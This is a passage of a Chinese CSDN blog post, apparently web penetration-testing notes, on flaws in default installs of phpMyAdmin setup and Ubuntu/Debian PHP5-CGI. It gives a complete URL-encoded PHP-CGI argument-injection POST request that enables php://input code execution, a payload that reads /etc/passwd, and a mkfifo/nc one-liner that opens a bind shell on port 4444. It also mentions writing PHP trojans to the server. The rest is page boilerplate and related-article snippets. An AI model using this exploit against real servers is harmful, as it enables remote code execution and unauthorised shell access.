web默认安装漏洞

最新推荐文章于 2023-04-23 17:29:42 发布
最新推荐文章于 2023-04-23 17:29:42 发布
阅读量409 收藏
点赞数
分类专栏: web渗透笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kali3426/article/details/79452251
版权

/phpmyadmin/setup


POST请求漏洞


写入静态PHP木马:



效果:


写入PHP动态木马:

(修改3.php)

打开nc侦听端口:


写入:

(成功)



Ubuntu/debian默认安装PHP5-cgi:

POST/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E %63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F %62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+ %2D%6EHTTP/1.1

Host: 123

<?php 

echo system('cat /etc/passwd');

?>



PHP脚本可替换为:

<?php

system('mkfifo /tmp/pipe;sh /tmp/pipe | nc-nlp 4444 > /tmp/pipe');  

?>

让服务器主动打开4444端口





a_16
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
手动挖掘之默认安装漏洞
Louisnie
09-28 562
phpMyAdmin是phpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 其安装Web服务器上的接口界面,主要用于使用php来管理安装服务器上的后台数据库(MySQL数据库),但如果采用默认安装,敏感路径未做出处理,便会存在安全漏洞,最突出的是其setup脚本中存在着服务器端请求伪造漏洞。远...
源码安装漏洞
kuiguowei的博客
01-12 469
一般在PHP源码程序都有一个初始安装的功能,如果相关代码没有对参数进行严禁的过滤,可能会导致攻击者访问安装页面(install.php)、或者构造数据包,对网站进行重新安装,从而危害网站安全,甚至直接拿到服务器权限。 安装页面可能产生的漏洞 无验证功能,任意重装覆盖 $_GET['step']跳过限制步骤 变量覆盖导致重装 判断 lock 后跳转无exit 解析 install
漏洞安装基础
weixin_50683638的博客
09-11 238
漏洞安装基础——目录 第一章 靶机环境搭建 1.vmware workstation 介绍 0x01 介绍 VMware是一个虚拟PC的软件,可以在现有的操纵系统上虚拟出一个新的硬件环境,相当于模拟出一台新的PC,以此来实现在一台机器上真正同时运行两个独立的操作系统。 VMware的主要特点: 不需要区分或重新开机就能在同一台PC上使用两种以上的操作系统; 本机系统可以与虚拟机系统网络通信; 可以设定并且随时修改虚拟机操作系统的硬件环境。 2.安装 vmware workstation 0x01
Linux默认配置文件系统路径 文件包含漏洞
xuqi7
11-23 732
做了一个题,用到了两个知识点(别问我为什么知道,大神告诉我的), 我用到的文件包含漏洞是类似于这样的:?file=../../../../../../../../../usr/local/apache2/conf/httpd.conf usr/local/apache2/conf/httpd.conf是你想要得到的文件路径,我遇到的是需要得到用户的密码 Linux默认文件路径,对就是这个,在
SQL Server 2000桌面引擎默认配置空口令漏洞
zgqtxwd的专栏
04-29 646
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
web中间件常见漏洞总结.pdf
12-14
9. **不安全的配置**:默认配置、未更新的补丁、过度权限分配等都可能成为安全隐患,攻击者可能利用这些漏洞获取系统控制权。 10. **输入验证不足**:对用户输入缺乏有效的检查和过滤,使得恶意数据得以进入系统,...
WEB服务器漏洞扫描
06-04
这些漏洞往往源于编程错误、不安全的默认配置或过时的软件组件。 【扫描】是网络安全维护中的一个关键步骤,通过自动化的扫描工具,可以定期或在特定情况下对服务器进行检查,发现潜在的安全问题。扫描工具会模拟...
常见web应用漏洞和检测方案
最新发布
06-06
常见的web应用漏洞和检测方案 明文信息传输漏洞 敏感信息泄露 默认或可猜解用户账户 会话重放攻击测试 验证码缺陷 http方法测试 不安全的cookie传输 CSRF漏洞测试 会话设计缺陷 会话定置测试 会话复杂度测试 会话...
Xray-web漏洞扫描工具.zip
02-02
如果一个漏洞能用回显检测就用回显检测,因为盲打平台增加了漏洞检测过程的不确定性和复杂性。 耗时操作谨慎处理 全局使用 Context 做管理,不会因为某个请求而导致全局卡死。 简易架构 了解 xray 的整体...
Web应用安全:IIS解析漏洞.pptx
06-19
总的来说,理解和防范IIS解析漏洞对于保障Web应用的安全至关重要。定期更新和维护服务器软件,以及正确配置服务器和应用程序,可以有效降低被利用的风险。同时,对网络日志进行监控,及时发现异常行为,也是预防和...
最新phpstudy默认配置漏洞解析
明哥哥知识分享
09-07 385
1.官网下载小皮面板 2.本地安装 3.漏洞复现 在www目录下新建test.txt文件,写入phpinfo函数 访问test.txt文件 调入exp 修复建议: 1.等待官方升级 2.更换为Apache或者装waf进行拦截 3.将php-fpm.conf中的security.limit_extensions后面的值设置为.php 免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点
typecho install.phpl漏洞分析
le31ei的博客
12-06 830
漏洞出了很久了一直没时间分析,现在有空记录下分析流程,学习下php反序列化的知识。
php之系统重装漏洞fengcms
qq_42307546的博客
05-30 345
项目地址 https://www.phpfans.net/xz/108401.html 一些php编写的网站在安装完成之后会在install目录下生成一个类似于install.lock文件来判断网站是否已经安装过了防止再次安装,但是由于逻辑上的问题只是判断了文件是否存在并没有退出导致了重装而且有的时候在安装过程中会把一些配置文件的信息通过post方式传输并保存在配置文件中如果没有对这些信息进行过滤我们就可以把恶意代码插进去 看一下安装的代码 install/index.php define("TPL_IN
linux php 漏洞修复后重新编译安装
小婷
04-23 216
linux php 漏洞修复后重新编译安装
最全phpmyadmin漏洞汇总
m0_67402013的博客
07-31 9498
phpMyAdmin是一个用php编写的免费软件工具,旨在通过Web友好界面处理MySQL的管理。phpMyAdmin支持对MySQL和MariaDB数据库的广泛操作。经常使用的操作(有如管理数据库、表、列、关系、索引、用户、权限等)可以通过用户界面执行,当然您也可以直接执行任何SQL语句。从1998年发布第一版,到目前发布的最新版为5.1.1,全部历史版本说明phpMyAdmin5.2未来版本与PHP7.2及更高版本和MySQL/MariaDB5.5及更高版本兼容。1、1、条件。...
web漏洞解决办法
热门推荐
Love life, Beyond the game! - Apollo
06-22 2万+
通过绿盟软件检测到的问题
第十二章 WEB渗透
09-02 1493
Web技术发展 • 静态WEB• 动态WEB  • 应用程序  • 数据库  • 每个人看到的内容不同  • 根据用户输入返回不同结果 WEB攻击面• Network• OS• WEB Server• App server• Web Application• Database• Browser HTTP协议基础• 明文  • 无内建的机密性安全机制  • 嗅探或代理截断可查看...
漏洞复现-Phpmyadmin setup.php反序列化漏洞(WooYun-2016-199433)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-04 3698
phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
手动漏洞挖掘 Ubuntu / Debian 默认安装php5-cgi
胡乱写点什么
08-12 782
手动漏洞挖掘(二) 学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。 ——Ubuntu / Debian 默认安装漏洞—— 需要的工具: burpsuit 靶机(我选择的是Metasploitable2) Ubuntu / Debian 默认安装php5-cgi漏洞 Ubuntu和Debian是两个Linux操作系统,由于他们两个会默认安装php5-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值